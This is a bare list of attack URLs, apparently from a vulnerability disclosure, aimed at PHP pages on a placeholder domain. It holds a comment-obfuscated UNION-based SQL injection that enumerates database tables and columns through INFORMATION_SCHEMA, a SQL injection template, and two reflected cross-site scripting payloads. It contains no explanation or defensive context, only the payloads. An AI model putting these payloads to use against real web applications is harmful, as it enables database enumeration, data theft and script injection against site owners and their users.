http://www.example.com/list.php?string=1&match=1&search=1/**/AND/**/1=0/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,table_name,column_name),0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/INFORMATION_SCHEMA.COLUMNS--
http://www.example.com/rss.php?cat=' {{SQL}}

http://www.example.com/rss.php?cat="><script>alert()</script>
http://www.example.com/opml.php?cat="><script>alert()</script>